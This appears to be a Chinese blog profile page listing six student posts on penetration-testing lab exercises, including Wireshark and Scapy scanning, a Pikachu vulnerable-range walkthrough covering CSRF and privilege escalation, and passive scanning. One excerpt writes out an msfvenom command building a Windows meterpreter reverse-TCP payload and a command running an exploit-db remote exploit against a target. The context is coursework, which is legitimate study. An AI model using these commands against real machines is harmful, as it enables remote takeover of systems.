- 博客(6)
- 收藏
- 关注
原创 信息收集和漏洞扫描
Wireshark抓包,在进行arp扫描时会先发送一个数据包询问,这个ip是谁的,其MAC地址是什么,然后目标ip会进行回复,发送一个reply包,里面有它的MAC地址。在wireshark中,主机向目标机发送80-90端口的tcp握手请求报文,目标机均回复RST,ACK,说明80-90的端口都是处于关闭状态。Scapy是Python中构造网络数据包的模块,它可以完成绝大多数工具所能完成的功能,例如:扫描,网络发现,跟踪路由,探测,攻击等。Wireshark捕获报文,截图显示以上操作相关报文。
2025-03-18 18:39:48
996
原创 Pikachu靶场通关
这个与上一题不同,这个的请求方式是post,所以我们不可以通过更改url的方式来进行,但是bp里有一个功能(找到抓到的包,右键选相关工具→CSRF PoC生成),可以对我们更改好的数据然后得到url,这样我们也可以通过这个url发送给用户,以此达到修改用户信息的功能。一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响应,而如果校验的规则过于简单则容易出现越权漏洞。
2024-11-05 11:44:22
794
原创 网络渗透复现作业
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip地址 lport=端口号 -f exe -o /root/payload.exe。python2 /usr/share/exploitdb/exploits/windows/remote/38526.py 靶机ip 端口号。可输入指令load -l查询可以对靶机执行的指令 输入指令ls查看靶机桌面的文件。2、利用Nmap扫描发现靶机(Windows)运行了该服务。4.下载靶机上任意一个文件。
2023-12-29 14:13:58
524
1
原创 网络渗透之用Wireshark抓包QQ分析
该数据包的目标地址是Destination: HuaweiTechno_19:9e:98 (c0:e3:fb:19:9e:98);源地址是Source: LiteonTechno_b5:0f:3f (9c:2f:9d:b5:0f:3f),该源地址就是我们的MAC地址。(4)单击OICQ - IM software, popular in China我们可以得到自己的QQ号码。三、我们在搜索框中输入oicq(oicq就是qq的意思),得到qq的流量数据包。四、我们随机选择一个数据包进行分析。
2023-11-26 21:26:40
5355
4
原创 网络渗透测试之被动扫描
首先我们了解到被动扫描主要是指在目标无法察觉的情况下进行的信息搜集。同时我们也可以使用关键词“country”来完成搜索,即在搜索框输入“Cisco +country:“USA””即可得到上图所示。2.可以利用搜索结果左侧的“国家”列表,选择对设备的所在位置进行限定,如选择美国,则显示。port:搜索端口号 port:22 搜索开放了SSH端口的主机。Device:搜索指定的设备类型,divice:router。Service:搜索指定的服务类型,service:http。2.360 网络空间资产测绘。
2023-11-19 20:58:13
189
原创 网络渗透测试之Kali Linux2桥接模式网络拓扑分析
Kali Linux 可以在桥接模式下 ifconfig 到手机热点的 IP,是因为桥接模式使得 Kali Linux 能够与外部网络设备建立物理连接,并获取其网络配置信息。而不能查看校园网的IP可能是因为权限的限制导致普通用户无法查看ip等敏感信息、校园网是的IP地址进行动态分配的,还有就是校园网那个设置了防火墙,让我们查看IP受到限制等等。由此可见,我们不能在kali中直接看到Guet-WiFi的网络配置,学校对于校园网还是有一定的防护作用让我们不能直接看到学校网络的IP。作业发布到自己blog备查。
2023-11-12 19:27:07
409
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人